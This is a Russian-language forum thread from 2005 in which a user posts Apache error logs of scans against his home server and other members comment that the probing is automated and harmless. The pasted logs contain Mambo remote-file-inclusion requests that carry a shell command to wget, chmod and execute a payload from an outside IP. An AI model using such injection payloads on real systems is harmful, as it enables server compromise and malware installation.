Oskom Forums

Oskom Forums


Добро пожаловать на Oskom Forums.
 
 
Сейчас на шардах UO Oskom
 
+ Ответить в теме
Показано с 1 по 14 из 14

Тема: че за

  1. #1

    По умолчанию че за

    лошье мой апач хакает ?
    Код:
    [Thu Dec 22 16:18:51 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/blog/xmlrpc.php
    [Thu Dec 22 16:18:52 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/blog/xmlsrv/xmlrpc.php
    [Thu Dec 22 16:18:54 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/blogs/xmlsrv/xmlrpc.php
    [Thu Dec 22 16:18:55 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/drupal/xmlrpc.php
    [Thu Dec 22 16:18:56 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/phpgroupware/xmlrpc.php
    [Thu Dec 22 16:18:57 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/wordpress/xmlrpc.php
    [Thu Dec 22 16:19:00 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/xmlrpc/xmlrpc.php
    [Thu Dec 22 16:19:01 2005] [error] [client 69.1.170.79] File does not exist: c:/program files/apache group/apache/htdocs/xmlsrv/xmlrpc.php
    [Thu Dec 22 16:49:51 2005] [error] [client 145.100.29.242] request failed: erroneous characters after protocol string: GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69 /micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\\x01.1
    [Thu Dec 22 16:49:52 2005] [error] [client 145.100.29.242] request failed: erroneous characters after protocol string: GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/ micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\\x01.1
    [Thu Dec 22 16:49:53 2005] [error] [client 145.100.29.242] request failed: erroneous characters after protocol string: GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo% 20YYY;echo|  HTTP\\x01.1
    [Thu Dec 22 16:49:54 2005] [error] [client 145.100.29.242] request failed: erroneous characters after protocol string: GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20 YYY;echo|  HTTP\\x01.1
    [Thu Dec 22 16:49:55 2005] [error] [client 145.100.29.242] request failed: erroneous characters after protocol string: GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;e cho%20YYY;echo|  HTTP\\x01.1
    [Thu Dec 22 16:49:56 2005] [error] [client 145.100.29.242] request failed: erroneous characters after protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;e cho%20YYY;echo|  HTTP\\x01.1
    [Thu Dec 22 16:52:30 2005] [error] [client 66.249.65.20] File does not exist: c:/program files/apache group/apache/htdocs/robots.txt
    [Thu Dec 22 16:52:32 2005] [error] [client 217.25.87.159] File does not exist: c:/program files/apache group/apache/htdocs/ls
    [Thu Dec 22 19:25:28 2005] [error] [client 84.29.91.123] request failed: erroneous characters after protocol string: GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69 /micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\\x01.1
    [Thu Dec 22 19:25:31 2005] [error] [client 84.29.91.123] request failed: erroneous characters after protocol string: GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/ micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\\x01.1
    [Thu Dec 22 19:25:34 2005] [error] [client 84.29.91.123] request failed: erroneous characters after protocol string: GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo% 20YYY;echo|  HTTP\\x01.1
    [Thu Dec 22 19:25:36 2005] [error] [client 84.29.91.123] request failed: erroneous characters after protocol string: GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20 YYY;echo|  HTTP\\x01.1
    [Thu Dec 22 19:25:39 2005] [error] [client 84.29.91.123] request failed: erroneous characters after protocol string: GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;e cho%20YYY;echo|  HTTP\\x01.1
    [Thu Dec 22 19:25:42 2005] [error] [client 84.29.91.123] request failed: erroneous characters after protocol string: GET /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;e cho%20YYY;echo|  HTTP\\x01.1
    у меня такого в помине не было. ни форумов нифига . скормный апач такой . чутьчуть файлов всяких :(

  2. Journeyman

    Регистрация
    04.12.2005
    Адрес
    Кукурузник] Josen...[<Baned>] |<Raggamuffin Whiteman>|[team]
    Сообщений
    358
    #2

    По умолчанию

    Это вообще чего такое то?-)

    Поясни хоть

  3. Подлый Лис
    [Banned]
    Регистрация
    23.12.2001
    Сообщений
    4,567
    #3

    По умолчанию

    бездарно хакают, надо сказать =)))
    Похоже юзают какой-нибудь Xspider или что-то еще, достаточно взглянуть на интервал запросов - всяко не в ручную =)

    ЗЫ
    Пробей IP'шник и сдай прову этого юзера, приложи логи сервака =)

  4. The Truth is Out There

    Регистрация
    14.11.2004
    Адрес
    ex-BELOMOR[D-Tox].
    Сообщений
    10,610
    #4

    По умолчанию

    наш ответ Троянам.
    Троянам - трояново :)
    ПС: ну хакнули и чего? :) панику поднимать? ;)

  5. Grandmaster
    [Banned]
    Регистрация
    26.07.2001
    Адрес
    old[Legion's 666] • B***h say somethin', i ain't a mind reader...
    Сообщений
    2,898
    #5

    По умолчанию

    что это за micu, интересно.

  6. Подлый Лис
    [Banned]
    Регистрация
    23.12.2001
    Сообщений
    4,567
    #6

    По умолчанию

    судя по действиям, которые хотели сделать - либо троян либо шелл =)))

  7. Grandmaster

    Регистрация
    26.08.2005
    Адрес
    Greykin
    Сообщений
    2,779
    #7

    По умолчанию

    фото вообще ничего не понял из топа ну ка автор объясни

  8. #8

    По умолчанию

    Цитата Сообщение от old CTaPuKaH
    наш ответ Троянам.
    Троянам - трояново :)
    ПС: ну хакнули и чего? :) панику поднимать? ;)
    хакалка маленькая мой апач хакнуть ! задолбали эти нубы ! ваще трафик гонят только епть !!

  9. #9

    По умолчанию

    Цитата Сообщение от Brodyaga
    фото вообще ничего не понял из топа :) ну ка автор объясни :)
    пытаются меня хакнуть ! :( дешевыми методами.

  10. Зелёный ЛОСЬ
    Аватар для Bonik
    Регистрация
    20.03.2001
    Адрес
    узурпаторы и диктаторы
    Сообщений
    16,143
    #10

    По умолчанию

    Да не понтуйся, обычные, вполне жизненные методы.

  11. #11

    По умолчанию

    ха. не прошли ведь )

  12. Grandmaster
    [Banned]
    Регистрация
    26.07.2001
    Адрес
    old[Legion's 666] • B***h say somethin', i ain't a mind reader...
    Сообщений
    2,898
    #12

    По умолчанию

    так и ломать то пытались через какие-то стандартные дырки по типу пхп-нюк или форумов. вряд ли даж в ручную смотрели, авторутер банальный. были бы установлены - сломали. так что гордиться нечем

  13. The Truth is Out There

    Регистрация
    14.11.2004
    Адрес
    ex-BELOMOR[D-Tox].
    Сообщений
    10,610
    #13

    По умолчанию

    Цитата Сообщение от LoBZ1K
    так что гордиться нечем :)
    вот и я про что.. а паники-то сколько? ;)

  14. Hakuna Matata

    Регистрация
    18.12.2001
    Адрес
    Пап подари мну на 18-летие аватарку...
    Сообщений
    11,504
    #14

    По умолчанию

    Цитата Сообщение от old CTaPuKaH
    а паники-то сколько?
    Че вы пацану кайф ломаете а ? Злыдни...

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения